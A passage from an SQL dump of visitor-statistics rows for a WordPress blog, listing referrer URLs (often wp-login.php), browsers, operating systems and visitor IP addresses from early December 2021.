(16983,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.209.184','000',0,1,0),
(16984,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.248.56','000',0,1,0),
(16985,'2021-12-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(16986,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.235.236.208','000',0,1,0),
(16987,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.111.136','000',0,1,0),
(16988,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.155.11','000',0,1,0),
(16989,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.159.152.211','000',0,1,0),
(16990,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.20.166','000',0,1,0),
(16991,'2021-12-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,5,0),
(16992,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.157.172','000',0,1,0),
(16993,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.2.128','000',0,1,0),
(16994,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.120.162','000',0,1,0),
(16995,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.198.145','000',0,1,0),
(16996,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.66.172','000',0,1,0),
(16997,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.67.254','000',0,1,0),
(16998,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.211.142','000',0,1,0),
(16999,'2021-12-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.36.112','000',0,1,0),
(17000,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.122.184','000',0,1,0),
(17001,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.33.65','000',0,1,0),
(17002,'2021-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.41.193','000',0,1,0),
(17003,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.222','000',0,2,0),
(17004,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.116.89','000',0,1,0),
(17005,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.54.28','000',0,1,0),
(17006,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.59.121','000',0,1,0),
(17007,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.26.31','000',0,1,0),
(17008,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.164.242','000',0,1,0),
(17009,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.205.10','000',0,1,0),
(17010,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.150.22','000',0,1,0),
(17011,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.124.43','000',0,1,0),
(17012,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.69.248','000',0,2,0),
(17013,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.87.57.53','000',0,1,0),
(17014,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.21.236','000',0,1,0),
(17015,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.206.54.52','000',0,1,0),
(17016,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.98.172','000',0,1,0),
(17017,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.78.98','000',0,1,0),
(17018,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.209.69','000',0,1,0),
(17019,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.90.7.22','000',0,1,0),
(17020,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.102.66','000',0,1,0),
(17021,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.111.66','000',0,1,0),
(17022,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.96.46','000',0,1,0),
(17023,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','35.175.235.240','000',0,1,0),
(17024,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.92.246.248','000',0,1,0),
(17025,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.221.98','000',0,1,0),
(17026,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.245.12','000',0,1,0),
(17027,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.109.226','000',0,1,0),
(17028,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.165.93','000',0,1,0),
(17029,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.22.221','000',0,1,0),
(17030,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.229.84','000',0,1,0),
(17031,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.103.125','000',0,1,0),
(17032,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.43.84','000',0,1,0),
(17033,'2021-12-06','http://ictbank.ir/blog','Chrome','OS X','10.15.6',NULL,NULL,'','34.254.199.88','000',0,2,0),
(17034,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.145.128.185','000',0,1,0),
(17035,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.255.246','000',0,1,0),
(17036,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.70.40','000',0,1,0),
(17037,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.204.67.82','000',0,1,0),
(17038,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.181.71','000',0,1,0),
(17039,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.189.183','000',0,1,0),
(17040,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.46.184','000',0,1,0),
(17041,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.202.210.109','000',0,1,0),
(17042,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.200.246','000',0,1,0),
(17043,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.89.115.178','000',0,1,0),
(17044,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.207.187.34','000',0,1,0),
(17045,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.197.161','000',0,1,0),
(17046,'2021-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.160.29.194','000',0,2,0),
(17047,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.227.27.23','000',0,1,0),
(17048,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.200.226','000',0,1,0),
(17049,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.191.23','000',0,1,0),
(17050,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.159.130.103','000',0,1,0),
(17051,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.148.241','000',0,1,0),
(17052,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.48.161','000',0,1,0),
(17053,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.179.216','000',0,1,0),
(17054,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.232.111','000',0,1,0),
(17055,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.166.205','000',0,1,0),
(17056,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.26.200','000',0,1,0),
(17057,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.205.104.219','000',0,1,0),
(17058,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.84.98','000',0,1,0),
(17059,'2021-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.133.168','000',0,2,0),
(17060,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.164.92.32','000',0,1,0),
(17061,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.82.115.198','000',0,1,0),
(17062,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.163.108','000',0,1,0),
(17063,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.88.40.148','000',0,1,0),
(17064,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.159.238','000',0,1,0),
(17065,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.209.88','000',0,1,0),
(17066,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.209.69.228','000',0,1,0),
(17067,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.87.234.2','000',0,1,0),
(17068,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.91.234.34','000',0,1,0),
(17069,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.136.132','000',0,1,0),
(17070,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.45.45','000',0,1,0),
(17071,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.124.23','000',0,1,0),
(17072,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.103.9','000',0,1,0),
(17073,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.89.89.48','000',0,1,0),
(17074,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.227.117.102','000',0,1,0),
(17075,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.113.0','000',0,1,0),
(17076,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.167.22','000',0,1,0),
(17077,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.110.224','000',0,1,0),
(17078,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.82.168','000',0,1,0),
(17079,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.7.245','000',0,1,0),
(17080,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.65.48','000',0,1,0),
(17081,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.129.244','000',0,1,0),
(17082,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.191.145','000',0,1,0),
(17083,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.150.145','000',0,1,0),
(17084,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.141.144','000',0,1,0),
(17085,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.158.248','000',0,1,0),
(17086,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.125.223','000',0,1,0),
(17087,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.191.129','000',0,1,0),
(17088,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.159.121','000',0,1,0),
(17089,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.123.72','000',0,1,0),
(17090,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','184.73.57.92','000',0,1,0),
(17091,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.137.127','000',0,1,0),
(17092,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.116.100','000',0,1,0),
(17093,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.133.95','000',0,1,0),
(17094,'2021-12-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','193.92.182.236','000',0,2,0),
(17095,'2021-12-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.39.214','000',0,1,0),
(17096,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.204.106','000',0,1,0),
(17097,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.209.221','000',0,1,0),
(17098,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.119.244','000',0,1,0),
(17099,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.160.177','000',0,1,0),
(17100,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.27.167','000',0,1,0),
(17101,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.177.129','000',0,1,0),
(17102,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.123.205','000',0,1,0),
(17103,'2021-12-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(17104,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.221.152','000',0,1,0),
(17105,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.89.90.93','000',0,1,0),
(17106,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.95.102','000',0,1,0),
(17107,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.171.156','000',0,1,0),
(17108,'2021-12-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(17109,'2021-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(17110,'2021-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17111,'2021-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(17112,'2021-12-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17113,'2021-12-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,4,0),
(17114,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.163.109.66','000',0,2,0),
(17115,'2021-12-07','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(17116,'2021-12-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.115','000',0,1,0),
(17117,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.202.170.11','000',0,2,0),
(17118,'2021-12-07','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(17119,'2021-12-07','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','62.159.226.12','000',0,1,0),
(17120,'2021-12-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','148.66.146.22','000',0,1,0),
(17121,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(17122,'2021-12-07','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','185.153.151.196','000',0,1,0),
(17123,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(17124,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.105.110','000',0,2,0),
(17125,'2021-12-07','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.129.136','000',0,2,0),
(17126,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.249.205','000',0,1,0),
(17127,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.249.64','000',0,1,0),
(17128,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.127.1','000',0,1,0),
(17129,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.97.234','000',0,1,0),
(17130,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.138.147','000',0,1,0),
(17131,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.96.223','000',0,1,0),
(17132,'2021-12-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(17133,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.154.178','000',0,1,0),
(17134,'2021-12-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,6,0),
(17135,'2021-12-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(17136,'2021-12-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.50.122.92','000',0,2,0),
(17137,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.190.153.97','000',0,1,0),
(17138,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.250.104','000',0,1,0),
(17139,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.190.24.208','000',0,1,0),
(17140,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.98.102','000',0,1,0),
(17141,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.251.72','000',0,1,0),
(17142,'2021-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(17143,'2021-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(17144,'2021-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(17145,'2021-12-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(17146,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.159.130','000',0,1,0),
(17147,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.237.134','000',0,1,0),
(17148,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.8.52','000',0,1,0),
(17149,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.207.185','000',0,1,0),
(17150,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.47.136','000',0,1,0),
(17151,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.208.157','000',0,1,0),
(17152,'2021-12-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.227','000',0,1,0),
(17153,'2021-12-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.139','000',0,1,0),
(17154,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.101.83','000',0,1,0),
(17155,'2021-12-07','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.187.133','000',0,1,0),
(17156,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.136.228','000',0,1,0),
(17157,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.242.99','000',0,1,0),
(17158,'2021-12-08','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(17159,'2021-12-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.209.31','000',0,2,0),
(17160,'2021-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(17161,'2021-12-08','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.156','000',0,1,0),
(17162,'2021-12-08','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.223','000',0,1,0),
(17163,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.16.59','000',0,1,0),
(17164,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.45.139','000',0,1,0),
(17165,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.121.167','000',0,1,0),
(17166,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.225.70','000',0,1,0),
(17167,'2021-12-08','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','165.227.215.95','000',0,2,0),
(17168,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.220.33','000',0,1,0),
(17169,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.25.10','000',0,1,0),
(17170,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.63.225','000',0,1,0),
(17171,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.49.11','000',0,1,0),
(17172,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.203.36','000',0,1,0),
(17173,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.165.128','000',0,1,0),
(17174,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.166.254','000',0,1,0),
(17175,'2021-12-08','http://82.102.9.14/blog','Firefox','OS X','10.15',NULL,NULL,'','34.245.162.17','000',0,2,0),
(17176,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.34.56','000',0,1,0),
(17177,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.115.64','000',0,1,0),
(17178,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.44.79','000',0,1,0),
(17179,'2021-12-08','http://ictbank.ir/blog/','Firefox','Windows','10.0',NULL,NULL,'','186.202.153.10','000',0,12,0),
(17180,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.108.59','000',0,1,0),
(17181,'2021-12-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(17182,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.197.181','000',0,1,0),
(17183,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.22.106','000',0,1,0),
(17184,'2021-12-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.13.203','000',0,2,0),
(17185,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.19.93','000',0,1,0),
(17186,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.100.63','000',0,1,0),
(17187,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.212.221','000',0,1,0),
(17188,'2021-12-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,8,0),
(17189,'2021-12-08','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.66','000',0,16,0),
(17190,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.114.19','000',0,1,0),
(17191,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.76.112','000',0,1,0),
(17192,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.31.246','000',0,1,0),
(17193,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.9.220','000',0,1,0),
(17194,'2021-12-08','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.155.251','000',0,1,0),
